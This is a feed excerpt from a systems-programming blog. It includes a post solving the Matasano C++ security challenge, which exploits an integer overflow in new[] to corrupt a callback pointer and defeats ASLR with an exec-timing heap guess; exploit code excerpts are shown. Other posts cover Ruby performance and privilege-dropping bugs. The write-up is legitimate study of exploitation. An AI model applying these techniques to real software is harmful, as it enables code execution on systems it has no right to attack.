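<p>For the displacement at 0x41150c and a 4096 byte page, that means calling <code>mprotect</code> on 0x411000 with a length of 0x510.</p>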
<p></p>
<h2>Sample output</h2>
<p>After requiring my ruby gem and running a test script which creates lots of objects, I see this output:</p>
<pre class="prettify">
...
source = test.rb, line = 8
source = test.rb, line = 8
source = test.rb, line = 8
source = test.rb, line = 8
source = test.rb, line = 8
source = test.rb, line = 8
source = test.rb, line = 8
...
</pre>
<p>
<p><b>Showing the file name and line number for each object getting allocated.</b> That should be a strong enough primitive to build a Ruby memory profiler without requiring end users to build a custom version of Ruby. It should also be possible to re-implement <a href="http://blog.evanweaver.com/articles/2007/04/28/bleak_house/">bleak_house</a> by using this gem (and maybe another trick or two).</p>
<p><b>Awesome.</b></p>
<h2>Conclusion</h2>
<ul>
<li>One step closer to building a memory profiler without requiring end users to find and use patches floating around the internet.</li>
<li>It is unclear whether cheap tricks like this are useful or harmful, but they are <b>fun</b> to write.</li>
<li>If you understand how your system works at an intimate level, nearly anything is possible. The work required to make it happen might be difficult though.</li>
</ul>
<h2>References</h2>
<ol class="footnotes"><li id="footnote_0_1253" class="footnote"><a href="http://en.wikipedia.org/wiki/Trampoline_%28computers%29">http://en.wikipedia.org/wiki/Trampoline_(computers)</a></li></ol>]]></content:encoded>
			<wfw:commentRss>http://timetobleed.com/rewrite-your-ruby-vm-at-runtime-to-hot-patch-useful-features/feed/</wfw:commentRss>
		<slash:comments>22</slash:comments>
		</item>
		<item>
		<title>Defeating the Matasano C++ Challenge with ASLR enabled</title>
		<link>http://timetobleed.com/defeating-the-matasano-c-challenge-with-aslr-enabled/</link>
		<comments>http://timetobleed.com/defeating-the-matasano-c-challenge-with-aslr-enabled/#comments</comments>
		<pubDate>Fri, 16 Oct 2009 11:59:29 +0000</pubDate>
		<dc:creator>Joe Damato</dc:creator>
				<category><![CDATA[bugfix]]></category>
		<category><![CDATA[debugging]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[systems]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[x86]]></category>
		<category><![CDATA[memory]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[x86_64]]></category>

		<guid isPermaLink="false">http://timetobleed.com/?p=1152</guid>
		<description><![CDATA[If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter. Important note I am NOT a security researcher (I kinda want to be though). As such, there are probably way better ways to do everything in this article. This article is just illustrating my thought process when cracking this challenge. [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://timetobleed.com/images/computer_bug.jpg"  alt="" width="400" height="300"/></center><br />

<p>If you enjoy this article, <a rel="alternate" type="application/rss+xml" href="http://feeds.feedburner.com/TimeToBleed">subscribe (via RSS or e-mail)</a> and <a href="http://twitter.com/joedamato">follow me on twitter.</a></p>
<h2>Important note</h2>
<p>I am <b>NOT</b> a security researcher (I kinda want to be though). As such, there are probably way better ways to do everything in this article. This article is just illustrating my thought process when cracking this challenge.</p>
<h2>The Challenge</h2>
<p>The <a href="http://chargen.matasano.com/chargen/2009/10/9/a-c-challenge.html">Matasano Security blog</a> recently posted an article titled <i>A C++ Challenge</i><sup>1</sup> which included a particularly ugly piece of C++ code that has a security vulnerability. The challenge is for the reader to find the vulnerability, use it to execute arbitrary code, and submit the data to Matasano.</p>
<p>Sounds easy enough, let&#8217;s do this! <i>cue hacking music</i></p>
<h2>Making it harder</h2>
<p>Recent Linux kernels have a feature called Address Space Layout Randomization (ASLR) which can be set in <code>/proc/sys/kernel/randomize_va_space</code>. ASLR is a security feature which randomizes the start address of various parts of a process image. Doing this makes exploiting a security bug more difficult because the exploit cannot use any hard coded addresses.</p>
<p>The options you can set are:</p>
<ul>
<li>0 &#8211; ASLR off</li>
<li>1 &#8211; Randomize the addresses of the stack, mmap area, and VDSO page. <b>This is the default.</b></li>
<li>2 &#8211; Everything in option 1, but also randomize the <code>brk</code> area so the heap is randomized.</li>
</ul>
<p>Just for fun I decided to set it to <b>2</b> to make exploiting the challenge more difficult.</p>
<h2>Got the code, but now what?</h2>
<p>I decided to start attacking this problem by looking for a few common errors, in this order:</p>
<ol>
<li><code>strcpy()/strncpy()</code> bugs <b>No calls</b></li>
<li><code>memcpy()</code> bugs <b>A few calls</b></li>
<li>Off by one bugs <b>None obvious</b></li>
</ol>
<p>It turned out from a quick look that all calls to <code>memcpy()</code> included sane, hard-coded values. So, it had to be something more complex.</p>
<h2>Digging deeper &#8211; finding input streams the user can control</h2>
<p>Next, I decided to actually <b>read</b> the code and see what it was doing at a high level and what inputs could be controlled. Turns out that the program reads data from a file and uses the data from the file to determine how many objects to allocate.</p>
<p>Obviously, this portion of the code caught my interest so let&#8217;s take a quick look:</p>
<pre class="prettyprint">
/* ... */

fd.read(file_in_mem, MAX_FILE_SIZE-1);

/* ... */

struct _stream_hdr *s = (struct _stream_hdr *) file_in_mem;

if(s->num_of_streams >= INT_MAX / (int)sizeof(int)) {
    safe_count = MAX_STREAMS;
} else {
    safe_count = s->num_of_streams;
}

Obj *o = new Obj[safe_count];
</pre>
<p>
<p>OK, so clearly that <code>if</code> statement is suspect. At the <i>very least</i> it doesn&#8217;t check for negative values, so you could end up with <code>safe_count = -1</code> which might do something interesting when passed to the <code>new</code> operator. Moreover, it appears this <code>if</code> statement will allow values as large as 536870910 ([INT_MAX / sizeof(int)] &#8211; 1).</p>
<p>Maybe the exploit has something to do with values this <code>if</code> statement is allowing through?</p>
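<p>To see which values slip through, here is a small Ruby model of that check. It is only a sketch: it assumes <code>num_of_streams</code> is a signed 32-bit <code>int</code> and a 4-byte <code>sizeof(int)</code> (as on i386), and the value of <code>MAX_STREAMS</code> below is made up, since the real one is not shown here.</p>

```ruby
INT_MAX = 2**31 - 1   # 32-bit signed int, as on i386
SIZEOF_INT = 4
MAX_STREAMS = 16      # hypothetical; the real value is not shown in the post

# Ruby model of the challenge's bounds check on num_of_streams.
def safe_count(num_of_streams)
  if num_of_streams >= INT_MAX / SIZEOF_INT
    MAX_STREAMS
  else
    num_of_streams
  end
end

# A negative value, the largest value let through, and the first clamped one.
[-1, 536_870_910, 536_870_911].each do |n|
  puts "#{n} -> #{safe_count(n)}"
end
```

<p>In this model both -1 and 536870910 come back unchanged, and only 536870911 and above are replaced with <code>MAX_STREAMS</code>.</p>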
<h2>A closer look at the integer overflow in <code>new</code></h2>
<p>Let&#8217;s use GDB to take a closer look at what the compiler does before calling <code>new</code>. I&#8217;ve added a few inline comments to explain the assembly code:</p>
<pre class="prettyprint">
mov    %edx,%eax   ;  %edx and %eax store s->num_of_streams
add    %eax,%eax   ;  add %eax to itself (s->num_of_streams * 2)
add    %edx,%eax   ;  add  s->num_of_streams + %eax (s->num_of_streams*3)
shl    $0x2,%eax   ;  multiply (s->num_of_streams * 3) by 4  (s->num_of_streams * 12)
mov    %eax,(%esp) ;  move it into position to pass to new
call   0x8048a7c <_Znaj@plt> ; call new
</pre>
<p>
<p>The compiler has generated code to calculate <code>s->num_of_streams * sizeof(Obj)</code>, where <code>sizeof(Obj)</code> is 12 bytes. For large values of <code>s->num_of_streams</code>, multiplying by 12 causes an <b>integer overflow</b>, and the value passed to <code>new</code> will actually be <i>less than</i> what was intended.</p>
<p>For my exploit, I ended up using the value 357913943. This value causes an overflow because 357913943 * 12 = 4294967316, which is 20 <i>more than</i> 2<sup>32</sup> (4294967296), and a 32-bit register can only hold values up to 2<sup>32</sup> &#8211; 1. The result wraps around, so the value passed to <code>new</code> is 20, which is, of course, significantly less than what we actually wanted to allocate. Other people have written about integer overflow in <code>new</code> in other compilers<sup>2</sup> before.</p>
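<p>The wraparound is easy to check by hand. This Ruby sketch models the 32-bit multiply by masking off everything above the low 32 bits; the method and constant names are mine, not from the challenge.</p>

```ruby
SIZEOF_OBJ = 12            # from the disassembly: count * 3 * 4
UINT32_MASK = 0xFFFF_FFFF  # keep only the low 32 bits, like %eax does

# Size in bytes that actually reaches operator new[] on a 32-bit target.
def wrapped_allocation_size(count)
  (count * SIZEOF_OBJ) & UINT32_MASK
end

count = 357_913_943
puts "true product:  #{count * SIZEOF_OBJ}"
puts "passed to new: #{wrapped_allocation_size(count)}"
```

<p>Ruby integers never overflow, so the first line prints the full product (4294967316) and the second prints what is left after the wrap (20).</p>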
<p>Let&#8217;s see how this can be used to cause arbitrary code to execute. <b>Remember</b>, for arbitrary code execution to occur there <i>must</i> be a way to <i>cause the target program to write some data to a memory address that can be controlled</i>.</p>
<h2>Find the (possible) hand-off(s) to arbitrary code</h2>
<p>To find any hand-off locations, I looked for places where memory writes were occurring in the program. I found a few memory writes:</p>
<ul>
<li>2 calls to <code>memset()</code></li>
<li>2 calls to <code>memcpy()</code></li>
<li><code>parse_stream()</code> of <code>class Obj</code></li>
</ul>
<p>Unfortunately (from the attacker&#8217;s perspective) the calls to <code>memcpy()</code> and <code>memset()</code> <i>looked</i> pretty sane. The <code>parse_stream()</code> function caught my interest, though.</p>
<p>Take a look:</p>
<pre class="prettyprint">
class Obj {
    public:
    int parse_stream(int t, char *stream)
    {
      type = t;
      // ... do something with stream here ...
      return 0;
    }

    int length;
    int type;
/* ... */
</pre>
<p>
<p><b>REMEMBER:</b> In C++, member functions of <code>class</code>es have a <b>sekrit parameter</b> which is a pointer to the object the function is being called on. In the function itself, this parameter is accessed using <code>this</code>. So the line writing to the <code>type</code> variable is actually doing <code>this->type = t;</code> where <code>this</code> is supplied to the function <b>sekritly</b> by the compiler.</p>
<p><b>This is important</b> because this piece of code could be our hand-off! We need to find a way to control the value of <code>this</code> so we can cause a memory write to a location of our choice.</p>
<h2>Controlling <code>this</code> to cause arbitrary code to execute</h2>
<p>Take a look at an important piece of code in the challenge:</p>
<pre class="prettyprint">
struct imetad {
  int msg_length;
  int (*callback)(int, struct imetad *);
/* ... */
</pre>
<p>
<p>Nice! The <code>callback</code> field of <code>struct imetad</code> is offset by 4 bytes into the structure. The <code>type</code> field of <code>class Obj</code> is also offset by 4 bytes. See where I&#8217;m going?</p>
<p>If we can control the <code>this</code> pointer to point at the <code>struct imetad</code> on the heap when <code>parse_stream</code> is called, it will overwrite the <code>callback</code> pointer. We&#8217;ll then be able to set the pointer to any address we want and hand-off execution to arbitrary code!</p>
<p>But how can we manipulate <code>this</code>?</p>
<p>Take a look at this piece of code that calls <code>callback</code>:</p>
<pre class="prettyprint">
o[i].parse_stream(dword, stream_temp);
imd->callback(o[i].type, imd);
</pre>
<p>
<p>Since it is possible to overflow <code>new</code> and allocate fewer objects than <code>safe_count</code> is counting, for some values of <code>i</code>, <i><code>o[i]</code> will be pointing at data that isn&#8217;t actually an <code>Obj</code> object, but just other data on the heap</i>. In fact, when <code>i = 2</code>, <b><code>o[i]</code> will be pointing at the <code>struct imetad</code> object on the heap</b>. The call to <code>parse_stream</code> will pass in a corrupted <code>this</code> pointer that points at <code>struct imetad</code>. The write to <code>type</code> will actually overwrite <code>callback</code> since they are both offset equal amounts into their respective structures.</p>
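<p>Here is a toy model of that out-of-bounds write, using a Ruby byte string as a stand-in for the heap. The sizes and field offsets come from the snippets above; placing the <code>struct imetad</code> exactly 24 bytes after the start of the array is an assumption made for illustration (the real distance depends on the allocator), and the addresses are made up.</p>

```ruby
OBJ_SIZE = 12        # sizeof(Obj) on i386, per the disassembly
TYPE_OFFSET = 4      # Obj's type field sits after the 4-byte length field
IMETAD_BASE = 24     # assumed heap offset of the struct imetad

# Mimics `o[index].type = value`: a 4-byte little-endian write at
# array_base + index * sizeof(Obj) + offsetof(type).
def simulate_parse_stream(heap, array_base, index, value)
  target = array_base + index * OBJ_SIZE + TYPE_OFFSET
  heap[target, 4] = [value].pack("V")
  target
end

heap = "\x00".b * 64
# struct imetad { int msg_length; int (*callback)(...); } with made-up values
heap[IMETAD_BASE, 8] = [16, 0x0804_8abc].pack("VV")

written_at = simulate_parse_stream(heap, 0, 2, 0x4141_4141)
msg_length, callback = heap[IMETAD_BASE, 8].unpack("VV")
puts "write landed at heap offset #{written_at}"
puts format("msg_length = %d, callback = 0x%08x", msg_length, callback)
```

<p>In the model, the write for <code>o[2]</code> lands 28 bytes in, which is past the 20 bytes actually allocated and right on top of the <code>callback</code> slot, while <code>msg_length</code> is left alone.</p>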
<p>And with that, we&#8217;ve successfully exploited the challenge causing arbitrary code to execute.</p>
<p>Let&#8217;s now figure out how to beat ASLR!</p>
<h2>How to defeat address space layout randomization</h2>
<p>I <b>did NOT</b> invent this technique, but I read about it and thought it was cool. You can read a more verbose explanation of this technique <a href="http://sophsec.com/research/aslr_research.html">here</a>. The idea behind the technique is pretty simple:
</p>
<ul>
<li>When you call <code>exec</code>, the PID remains the same, but the image of the process in memory is changed.</li>
<li>The kernel uses the PID and the number of jiffies (jiffies is a fine-grained time measurement in the kernel) to pull data from the entropy pool.</li>
<li>If you can run a program which records stack, heap, and other addresses and then quickly call <code>exec</code> to start the vulnerable program, you can end up with the <b>same memory layout</b>.</li>
</ul>
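<p>The first point is easy to verify for yourself. This Ruby sketch (assuming a Unix-like system where <code>fork</code> is available) forks a child, has it report its PID, and then <code>exec</code>s a fresh Ruby interpreter that reports its own PID. It only demonstrates that the PID survives <code>exec</code>; it does not try to predict any addresses.</p>

```ruby
require "rbconfig"

# Returns [pid_before_exec, pid_after_exec] as reported by a child process.
def pids_across_exec
  reader, writer = IO.pipe
  child = fork do
    reader.close
    writer.puts(Process.pid) # PID while still running this script
    # Replace the process image; the new program reports its own PID.
    exec(RbConfig.ruby, "-e", "puts Process.pid", out: writer)
  end
  writer.close
  before, after = reader.read.split.map(&:to_i)
  Process.wait(child)
  [before, after]
end

before, after = pids_across_exec
puts "before exec: #{before}, after exec: #{after}"
```

<p>Both numbers should be the same, even though the second one is printed by a completely different program image.</p>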
<p>My exploit program is actually a <i>wrapper</i> which records an approximate location of the heap (by just calling <code>malloc()</code>), generates the exploit file, and then executes the challenge binary.</p>
<p>Take a look at the relevant pieces of my exploit to get an idea of how it works:
<pre class="prettyprint">
/* ... */

/* do a malloc to get an idea of where the heap lives */
void *dummy = malloc(10);

/* ... */

unsigned int shell_addr = reinterpret_void_ptr_as_uint(dummy);

/*
 * XXX TODO FIXME - on my platform, execl'ing from here to the challenge binary
 * incurs a constant offset of 0x3160, probably for changes in the environment
 * (libs linked for c++ and whatnot).
 */
shell_addr += 0x3160;

/*
 * a guess as to how far off the heap the shellcode lives.
 *
 * luckily we have a large NOP sled, so we should only fail when we miss
 * the current entropy cycle (see below).
 */
shell_addr += 700;

/* ... build exploit file in memory ... */

/* copy in our best guess as to the address of the shellcode, pray NOPs
 * take care of the rest! */
memcpy(entire_file+88, &#038;shell_addr, sizeof(shell_addr));

/* ... write exploit out to disk ... */

/* launch program with the generated exploit file!
*
* calling execl here inherits the PID of this process, and IF we get lucky
* ~85%+ of the time, we'll execute before the next entropy cycle and hit
* the shellcode, even with ASLR=2.
*/
execl("./cpp_challenge", "cpp_challenge", "exploit", (char *)0);
</pre>
<h2>My exploit for the C++ challenge</h2>
<p>My exploit comes with the following caveats:</p>
<ul>
<li>i386 system</li>
<li>The challenge binary is called &#8220;cpp_challenge&#8221; and lives in the same directory as the exploit binary.</li>
<li>The exploit binary can write to the directory and create a file called &#8220;exploit&#8221; which will be handed off to &#8220;cpp_challenge&#8221;</li>
</ul>
<p>Get the full code of my exploit <a href="http://timetobleed.com/files/exploit_gen.c">here</a>.</p>
<h2>Results</h2>
<p>Results on my i386 Ubuntu 8.04 VM running in VMware Fusion, for each level of <code>randomize_va_space</code>:</p>
<ul>
<li>0 &#8211; <b>100%</b> exploit hit rate</li>
<li>1 &#8211; <b>100%</b> exploit hit rate</li>
<li>2 &#8211; <b>~85%</b> exploit hit rate. Sometimes, my exploit code falls out of the time window and the address map changes before the challenge binary is run</li>
</ul>
<p>I could probably boost the hit rate for 2 a bit, but to do that I&#8217;d probably have to rewrite the entire exploit in assembly to make it run as fast as possible. I didn&#8217;t think there was really a point in going to such an extreme, though, so an 85% hit rate is good enough.</p>
<h2>Conclusion</h2>
<ol>
<li>Security challenges are fun.</li>
<li>More emphasis and more freely available information on secure coding would be very useful.</li>
<li>Like it or not, developers need to be security conscious when writing code in C and C++.</li>
<li>As C and C++ change, developers need to carefully consider security implications of new features.</li>
</ol>
<p>
Thanks for reading and don&#8217;t forget to <a rel="alternate" type="application/rss+xml" href="http://feeds.feedburner.com/TimeToBleed">subscribe (via RSS or e-mail)</a> and <a href="http://twitter.com/joedamato">follow me on twitter.</a></p>
<h2>References</h2>
<ol class="footnotes"><li id="footnote_0_1152" class="footnote"><a href="http://chargen.matasano.com/chargen/2009/10/9/a-c-challenge.html">Matasano Security LLC &#8211; Chargen &#8211; A C++ Challenge</a></li><li id="footnote_1_1152" class="footnote"><a href="http://blogs.msdn.com/oldnewthing/archive/2004/01/29/64389.aspx">Integer overflow in the new[] operator</a></li></ol>]]></content:encoded>
			<wfw:commentRss>http://timetobleed.com/defeating-the-matasano-c-challenge-with-aslr-enabled/feed/</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>Fix a bug in Ruby&#8217;s configure.in and get a ~30% performance boost.</title>
		<link>http://timetobleed.com/fix-a-bug-in-rubys-configurein-and-get-a-30-performance-boost/</link>
		<comments>http://timetobleed.com/fix-a-bug-in-rubys-configurein-and-get-a-30-performance-boost/#comments</comments>
		<pubDate>Tue, 05 May 2009 08:20:29 +0000</pubDate>
		<dc:creator>Joe Damato</dc:creator>
				<category><![CDATA[bugfix]]></category>
		<category><![CDATA[debugging]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[monitoring]]></category>
		<category><![CDATA[ruby]]></category>
		<category><![CDATA[scaling]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[x86]]></category>
		<category><![CDATA[debug]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[patches]]></category>
		<category><![CDATA[performance]]></category>
		<category><![CDATA[strace]]></category>
		<category><![CDATA[syscall]]></category>
		<category><![CDATA[systems]]></category>
		<category><![CDATA[threading]]></category>
		<category><![CDATA[threads]]></category>

		<guid isPermaLink="false">http://timetobleed.com/?p=615</guid>
		<description><![CDATA[Special thanks&#8230; Going out to Jake Douglas for pushing the initial investigation and getting the ball rolling. The whole --enable-pthread thing Ask any Ruby hacker how to easily increase performance in a threaded Ruby application and they&#8217;ll probably tell you: Yo dude&#8230; Everyone knows you need to configure Ruby with --disable-pthread. And it&#8217;s true; configure [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://timetobleed.com/images/ruby_bug.jpg"/></center><br />
</p>
<p>
<h2>Special thanks&#8230;</h2>
<p>Going out to <a href="http://twitter.com/jakedouglas">Jake Douglas</a> for pushing the initial investigation and getting the ball rolling.</p>
<p><h2>The whole <code>--enable-pthread</code> thing</h2>
<p>Ask any Ruby hacker how to easily increase performance in a threaded Ruby application and they&#8217;ll probably tell you:<br />
<b><br />
Yo dude&#8230; <i>Everyone</i> knows you need to <code>configure</code> Ruby with <code>--disable-pthread</code>.<br />
</b><br />
And it&#8217;s true; <code>configure</code> Ruby with <code>--disable-pthread</code> and you get a ~30% performance boost. But&#8230; <b><i>why?</i></b></p>
<p> For this, we&#8217;ll have to turn to our handy tool <a href="http://timetobleed.com/hello-world/">strace</a>. We&#8217;ll also need a simple Ruby program to test with. How about something like this:</p>
<p>
<pre class="prettyprint lang-rb">
def make_thread
  Thread.new {
    a = []
    10_000_000.times {
      a << "a"
      a.pop
    }
  }
end

t = make_thread
t1 = make_thread 

t.join
t1.join</pre>
<p></p>
<p>Now, let's run <code>strace</code> on a version of Ruby <code>configure</code>'d with <code>--enable-pthread</code> and point it at our test script. The output from <code>strace</code> looks like this:</p>
<p>
<pre class="prettyprint lang-c">
22:46:16.706136 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706177 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706218 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706259 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000005>
22:46:16.706301 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706342 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706383 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706425 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706466 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004></pre>
<p></p>
<p><b>Pages and pages and pages</b> of <code>sigprocmask</code> system calls (actually, running with <code>strace -c</code>, I get about <b>20,054,180</b> calls to <code>sigprocmask</code>, <b>WOW</b>). Run the <i>same test script</i> against a Ruby built with <code>--disable-pthread</code> and the output does <b>not</b> have pages and pages of <code>sigprocmask</code> calls (only <b>3</b>, a <b>HUGE</b> reduction).
</p>
<p><h2>OK, so let's just set a breakpoint in GDB... right?</h2>
<p>OK, so we should just be able to set a <code>breakpoint</code> on <code>sigprocmask</code> and figure out who is calling it.</p>
<p><b>Well, not exactly.</b> You can try it, but the breakpoint <b>won't trigger</b> (we'll see why a little bit later).</p>
<p>Hrm, that kinda sucks and is confusing. This will make it harder to track down who is calling <code>sigprocmask</code> in the threaded case.</p>
<p> Well, we know that when you run <code>configure</code> the script creates a <code>config.h</code> with a bunch of <code>define</code>s that Ruby uses to decide which functions to use for what. So let's compare <code>./configure --enable-pthread</code> with <code>./configure --disable-pthread</code>:</p>
<pre class="prettyprint lang-bsh">
[joe@mawu:/home/joe/ruby]% diff config.h config.h.pthread
> #define _REENTRANT 1
> #define _THREAD_SAFE 1
> #define HAVE_LIBPTHREAD 1
> #define HAVE_NANOSLEEP 1
> #define HAVE_GETCONTEXT 1
> #define HAVE_SETCONTEXT 1</pre>
</p>
<p>
<br />
OK, now if we <code>grep</code> the Ruby source code, we see that whenever <code>HAVE_[SG]ETCONTEXT</code> are set, Ruby uses the library functions <code>setcontext()</code> and <code>getcontext()</code> to save and restore state for context switching and for exception handling (via the <code>EXEC_TAG</code>). </p>
<p>What about when <code>HAVE_[SG]ETCONTEXT</code> are <b>not</b> <code>define</code>'d? Well in that case, Ruby uses <code>_setjmp/_longjmp</code>.</p>
<p><b>Bingo!</b></p>
<p>That's what's going on! From the <code>_setjmp/_longjmp</code> man page:</p>
<blockquote><p>... The _longjmp()  and  _setjmp()  functions  shall  be  equivalent  to  longjmp() and setjmp(), respectively, with the additional restriction that _longjmp() and _setjmp() shall not manipulate the signal mask...</p></blockquote>
<p>And from the <code>[sg]etcontext</code> man page:</p>
<blockquote><p>... uc_sigmask is the set of signals blocked in this context (see sigprocmask(2)) ...</p></blockquote>
<p>
<br />The issue is that <code>getcontext</code> makes the <code>sigprocmask</code> system call on <b>every invocation</b> but <code>_setjmp</code> does not.</p>
<p><b>BUT WAIT</b>, if that's true, why didn't <code>GDB</code> hit a <code>sigprocmask</code> breakpoint before?</p>
<p><h2>x86_64 assembly FTW, again</h2>
</p>
<p>
Let's fire up <code>gdb</code> and figure out this breakpoint-not-breaking thing. First, let's start by disassembling <code>getcontext</code> (snipped for brevity):<br />
<code><br />
(gdb) p getcontext<br />
$1 = {&lt;text variable, no debug info&gt;} 0x7ffff7825100 &lt;getcontext&gt;<br />
(gdb) disas getcontext<br />
...<br />
0x00007ffff782517f &lt;getcontext+127&gt;:	mov    $0xe,%rax<br />
0x00007ffff7825186 &lt;getcontext+134&gt;:	syscall<br />
...<br />
</code></p>
<p>Yeah, that's pretty weird. I'll explain why in a minute, but let's look at the disassembly of <code>sigprocmask</code> first:<br />
<code><br />
(gdb) p sigprocmask<br />
$2 = {&lt;text variable, no debug info&gt;} 0x7ffff7817340 &lt;__sigprocmask&gt;<br />
(gdb) disas sigprocmask<br />
...<br />
0x00007ffff7817383 &lt;__sigprocmask+67&gt;:	mov    $0xe,%rax<br />
0x00007ffff7817388 &lt;__sigprocmask+72&gt;:	syscall<br />
...<br />
</code><br />
Yeah, this is a bit confusing, but here's the deal.</p>
<p>
Recent Linux kernels support a shiny new way of making system calls: the <code>sysenter/sysexit</code> instructions on 32-bit x86 and the <code>syscall/sysret</code> instructions on x86_64. This new way was created because the old way (<code>int $0x80</code>) turned out to be pretty slow, so the CPU vendors added dedicated instructions to execute system calls without such huge overhead.</p>
<p> All you need to know right now (I'll try to blog more about this in the future) is that the <code>%rax</code> register holds the system call number. The <code>syscall</code> instruction transfers control to the kernel and the kernel figures out which syscall you wanted by checking the value in <code>%rax</code>. Let's just make sure that <code>sigprocmask</code> is actually 0xe:</p>
<pre class="prettyprint lang-c">
[joe@pluto:/usr/include]% grep -Hrn "sigprocmask" asm-x86_64/unistd.h
asm-x86_64/unistd.h:44:#define __NR_rt_sigprocmask                     14</pre>
<p>
<br />
<b>Bingo. It's calling <code>sigprocmask</code> (albeit a bit obscurely).</b></p>
<p>
OK, so <code>getcontext</code> isn't calling <code>sigprocmask</code> directly, instead it replicates a bunch of code that <code>sigprocmask</code> has in its function body. That's why we didn't hit the <code>sigprocmask</code> breakpoint; <code>GDB</code> was going to break if you landed on the address <code>0x7ffff7817340</code> but <b>you didn't</b>. </p>
<p>Instead, <code>getcontext</code> reimplements the wrapper code for <code>sigprocmask</code> itself and <code>GDB</code> is none the wiser. </p>
<p><b>Mystery solved</b>.</p>
<p><h2>The patch</h2>
</p>
<p>
Get it <b><a href="http://github.com/ice799/matzruby/commit/0b9b69f9653782a33aee2b8937d405eae245b60c">HERE</a></b></p>
<p>
The patch works by adding a new configure flag called <code>--disable-ucontext</code> that lets you specifically disable the use of <code>[sg]etcontext</code>. You <b>use this in conjunction with</b> <code>--enable-pthread</code>, like this:<br />
<code><br />
./configure --disable-ucontext --enable-pthread</code><br />
<br />
After you build Ruby configured like that, its performance is on par with (and sometimes slightly faster than) Ruby built with <code>--disable-pthread</code>, for about a 30% performance boost when compared to plain <code>--enable-pthread</code>.</p>
<p>I added the switch because I wanted to preserve the original Ruby behavior: if you just pass <code>--enable-pthread</code> <b>without</b> <code>--disable-ucontext</code>, Ruby will do the old thing and generate piles of <code>sigprocmask</code> calls.</p>
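<p>If you want to compare builds on your own machine, something like the following rough timing harness might help. It runs the same push/pop loop as the test script earlier and reports wall-clock time; the method name and the iteration count are my own choices for this sketch, so treat the numbers as a sanity check rather than a proper benchmark.</p>

```ruby
# Runs the same push/pop loop as the test script in `thread_count` threads
# and returns the elapsed wall-clock time in seconds.
def time_thread_workload(iterations, thread_count = 2)
  started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  threads = Array.new(thread_count) do
    Thread.new do
      a = []
      iterations.times do
        a.push("a")
        a.pop
      end
    end
  end
  threads.each(&:join)
  Process.clock_gettime(Process::CLOCK_MONOTONIC) - started
end

elapsed = time_thread_workload(1_000_000)
puts format("elapsed: %.3f s", elapsed)
```

<p>Run it once under each Ruby build (for example one configured with <code>--enable-pthread</code> and one with <code>--disable-pthread</code>) and compare the elapsed times.</p>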
<h2>Conclusion</h2>
<ol>
<li> Things aren't always what they seem - GDB may lie to you. Be careful. </li>
<li> Use the source, Luke. Libraries can do unexpected things, debug builds of libc can help!</li>
<li> I know I keep saying this, but assembly is useful. Start learning it today!</li>
</ol>
<p>
If you enjoyed this blog post, consider <a href="http://feeds.feedburner.com/TimeToBleed" rel="alternate" type="application/rss+xml">subscribing (via RSS)</a> or <a href="http://twitter.com/joedamato">following (via twitter)</a>.</p>
<p><b>You'll want to stay tuned; <a href="http://twitter.com/tmm1">tmm1</a> and I have been on a roll the past week. Lots of cool stuff coming out!</b></p>
]]></content:encoded>
			<wfw:commentRss>http://timetobleed.com/fix-a-bug-in-rubys-configurein-and-get-a-30-performance-boost/feed/</wfw:commentRss>
		<slash:comments>45</slash:comments>
		</item>
		<item>
		<title>5 Things You Don&#8217;t Know About User IDs That Will Destroy You</title>
		<link>http://timetobleed.com/5-things-you-dont-know-about-user-ids-that-will-destroy-you/</link>
		<comments>http://timetobleed.com/5-things-you-dont-know-about-user-ids-that-will-destroy-you/#comments</comments>
		<pubDate>Mon, 13 Apr 2009 17:06:33 +0000</pubDate>
		<dc:creator>Joe Damato</dc:creator>
				<category><![CDATA[monitoring]]></category>
		<category><![CDATA[ruby]]></category>
		<category><![CDATA[systems]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[privilege escalation]]></category>
		<category><![CDATA[privileges]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://timetobleed.com/?p=419</guid>
		<description><![CDATA[*nix user and group IDs are complicated, confusing, and often misused. Look at this code snippet from the popular Ruby project, Starling: def drop_privileges &#160; Process.egid = options&#91;:group&#93; if options&#91;:group&#93; &#160; Process.euid = options&#91;:user&#93; if options&#91;:user&#93; end At quick first glance, you might think this code looks OK. But you&#8217;d be wrong. Let&#8217;s take a [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://timetobleed.com/images/jail.jpg"/></center><br />
</p>
<p>
*nix user and group IDs are complicated, confusing, and often misused. Look at this code snippet from the popular Ruby project, <a href="http://github.com/starling/starling/blob/e958961c4d92e8c30d23ee4c6759021748d7578c/lib/starling/server_runner.rb#L184">Starling</a>: </p>
<div class="dean_ch" style="white-space: wrap;">
<span class="kw1">def</span> drop_privileges<br />
&nbsp; <span class="kw4">Process</span>.<span class="me1">egid</span> = options<span class="br0">&#91;</span><span class="re3">:group</span><span class="br0">&#93;</span> <span class="kw1">if</span> options<span class="br0">&#91;</span><span class="re3">:group</span><span class="br0">&#93;</span><br />
